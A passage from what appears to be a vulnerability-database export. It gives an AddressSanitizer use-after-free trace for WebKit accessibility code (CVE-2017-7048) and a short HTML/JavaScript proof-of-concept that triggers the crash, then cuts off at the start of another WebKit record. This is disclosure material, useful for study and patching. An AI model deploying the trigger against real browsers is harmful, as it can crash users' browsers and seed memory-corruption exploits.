(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1df50d)\r\n #12 0x10a820041 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x919041)\r\n #13 0x10a826268 in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f268)\r\n #14 0x10a82607c in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f07c)\r\n #15 0x10a81f8d7 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9188d7)\r\n #16 0x10a81f6c1 in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9186c1)\r\n #17 0x10b463b93 in WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x155cb93)\r\n #18 0x10b4555d8 in long long WebCore::BindingCaller<WebCore::JSElement>::callOperation<&(WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e5d8)\r\n #19 0x10b455441 in WebCore::jsElementPrototypeFunctionSetAttribute(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e441)\r\n #20 0x279e6e001027 (<unknown module>)\r\n #21 0x115e2934a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)\r\n #22 0x115e2934a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)\r\n #23 0x115e2291a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157091a)\r\n #24 0x115a87757 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11d5757)\r\n #25 0x115a093da in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11573da)\r\n #26 0x1150410f1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f0f1)\r\n #27 0x115041362 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f362)\r\n #28 0x1150416d3 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f6d3)\r\n #29 0x10b0faa15 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11f3a15)\r\n #30 0x10b48e510 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1587510)\r\n #31 0x10a88f68e in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x98868e)\r\n #32 0x10a88f170 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x988170)\r\n #33 0x10a76a041 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x863041)\r\n #34 0x10a779aaf in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x872aaf)\r\n #35 0x10a67b7af in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7747af)\r\n #36 0x10a676103 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f103)\r\n #37 0x10aa1b9ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce)\r\n #38 0x10aa18d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c)\r\n #39 0x10a694493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493)\r\n #40 0x10ac085c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0)\r\n #41 0x10a733093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093)\r\n #42 0x10a6f2386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)\r\n #43 0x10a181997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)\r\n #44 0x10a17b2aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)\r\n #45 0x10cb02c41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)\r\n #46 0x10260c2eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)\r\n #47 0x10260f689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)\r\n #48 0x10260eba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)\r\n #49 0x101eaf683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)\r\n #50 0x101c593b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)\r\n #51 0x101c62888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)\r\n #52 0x1164b5312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312)\r\n #53 0x1164b5d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41)\r\n #54 0x7fff8da4f3c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0)\r\n #55 0x7fff8da302cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc)\r\n #56 0x7fff8da2f7c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5)\r\n #57 0x7fff8da2f1c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3)\r\n #58 0x7fff8cf90ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)\r\n #59 0x7fff8cf90cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)\r\n #60 0x7fff8cf90b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)\r\n #61 0x7fff8b52be23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)\r\n #62 0x7fff8bca785d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)\r\n #63 0x7fff8b5207aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)\r\n #64 0x7fff8b4eb1dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)\r\n #65 0x7fffa33eb8c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)\r\n #66 0x7fffa33ea2e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)\r\n #67 0x101b7156c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)\r\n #68 0x7fffa3192234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)\r\n\r\n0x6080000908a0 is located 0 bytes inside of 88-byte region [0x6080000908a0,0x6080000908f8)\r\nfreed by thread T0 here:\r\n #0 0x104b54294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)\r\n #1 0x1164fcf30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30)\r\n #2 0x10a0e1fda in WebCore::AXObjectCache::remove(unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dafda)\r\n #3 0x10a0e576e in WebCore::AXObjectCache::remove(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1de76e)\r\n #4 0x10c573c0b in WebCore::RenderObject::willBeDestroyed() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x266cc0b)\r\n #5 0x10c681ac3 in WebCore::RenderText::willBeDestroyed() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x277aac3)\r\n #6 0x10c57412f in WebCore::RenderObject::destroy() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x266d12f)\r\n #7 0x10c6d35ba in WebCore::RenderTreeUpdater::tearDownRenderer(WebCore::Text&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cc5ba)\r\n #8 0x10c6d22a8 in WebCore::RenderTreeUpdater::tearDownRenderers(WebCore::Element&, WebCore::RenderTreeUpdater::TeardownType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cb2a8)\r\n #9 0x10c6d11de in WebCore::RenderTreeUpdater::updateElementRenderer(WebCore::Element&, WebCore::Style::ElementUpdate const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca1de)\r\n #10 0x10c6d0c4d in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9c4d)\r\n #11 0x10c6d047b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b)\r\n #12 0x10a6757e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9)\r\n #13 0x10a670185 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x769185)\r\n #14 0x10a6767b2 in WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f7b2)\r\n #15 0x10ccec7c6 in WebCore::TextIterator::TextIterator(WebCore::Range const*, unsigned short) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2de57c6)\r\n #16 0x10ccf8b2f in WebCore::plainText(WebCore::Range const*, unsigned short, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2df1b2f)\r\n #17 0x109f5820d in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x5120d)\r\n #18 0x109f2c9e2 in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x259e2)\r\n #19 0x109f58273 in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51273)\r\n #20 0x109f2a6e0 in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x236e0)\r\n #21 0x109f2e8d3 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x278d3)\r\n #22 0x109f2ec3e in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c3e)\r\n #23 0x109f279c9 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x209c9)\r\n #24 0x109f2ed5c in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d5c)\r\n #25 0x109f5d550 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x56550)\r\n #26 0x109f464ab in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3f4ab)\r\n #27 0x10a0e2df1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbdf1)\r\n #28 0x10a0e0b6f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9b6f)\r\n #29 0x10a0e650d in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1df50d)\r\n\r\npreviously allocated by thread T0 here:\r\n #0 0x104b53d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)\r\n #1 0x7fffa3314281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)\r\n #2 0x116506ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)\r\n #3 0x1164fbc4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)\r\n #4 0x116491437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)\r\n #5 0x116490768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)\r\n #6 0x109f09a08 in WTF::RefCounted<WebCore::AccessibilityObject>::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a08)\r\n #7 0x109f55ef9 in WebCore::AccessibilityRenderObject::create(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x4eef9)\r\n #8 0x10a0e3e5d in WebCore::createFromRenderer(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dce5d)\r\n #9 0x10a0e2c59 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbc59)\r\n #10 0x109f2c7c3 in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x257c3)\r\n #11 0x109f58273 in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51273)\r\n #12 0x109f2a6e0 in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x236e0)\r\n #13 0x109f2e8d3 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x278d3)\r\n #14 0x109f2ec3e in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c3e)\r\n #15 0x109f279c9 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x209c9)\r\n #16 0x109f2ed5c in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d5c)\r\n #17 0x109f5d550 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x56550)\r\n #18 0x109f464ab in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3f4ab)\r\n #19 0x10a0e2df1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbdf1)\r\n #20 0x10a0e0b6f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9b6f)\r\n #21 0x10a0e650d in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1df50d)\r\n #22 0x10a820041 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x919041)\r\n #23 0x10a826268 in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f268)\r\n #24 0x10a82607c in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f07c)\r\n #25 0x10a81f8d7 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9188d7)\r\n #26 0x10a81f6c1 in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9186c1)\r\n #27 0x10b463b93 in WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x155cb93)\r\n #28 0x10b4555d8 in long long WebCore::BindingCaller<WebCore::JSElement>::callOperation<&(WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e5d8)\r\n #29 0x10b455441 in WebCore::jsElementPrototypeFunctionSetAttribute(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e441)\r\n\r\nSUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25bb4) in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const\r\nShadow bytes around the buggy address:\r\n 0x1c10000120c0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c10000120d0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c10000120e0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1c10000120f0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa\r\n 0x1c1000012100: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd\r\n=>0x1c1000012110: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fd fd fa\r\n 0x1c1000012120: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012130: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012140: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012150: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012160: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==728==ABORTING\r\n```", "published": "2017-07-27T00:00:00", "type": "seebug", "title": "WebKit: use-after-free in WebCore::AccessibilityNodeObject::textUnderElement(CVE-2017-7048)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7048"], "modified": "2017-07-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96314", "id": "SSV:96314", "sourceData": "\n <script>\r\nfunction go() {\r\n li.hidden = true;\r\n dir.setAttribute(\"aria-labeledby\", \"map\");\r\n}\r\n</script>\r\n<body onload=go()>\r\n<dir id=\"dir\">\r\n<li id=\"li\">\r\n<map id=\"map\">\r\n<area></area>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96314", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T11:56:42", "description": "Here is a snippet of `ArgumentsEliminationPhase::transform`\r\n```\r\n case LoadVarargs:\r\n ...\r\n if (candidate->op() == PhantomNewArrayWithSpread || candidate->op() == PhantomSpread) {\r\n ...\r\n if (argumentCountIncludingThis <= varargsData->limit) {\r\n 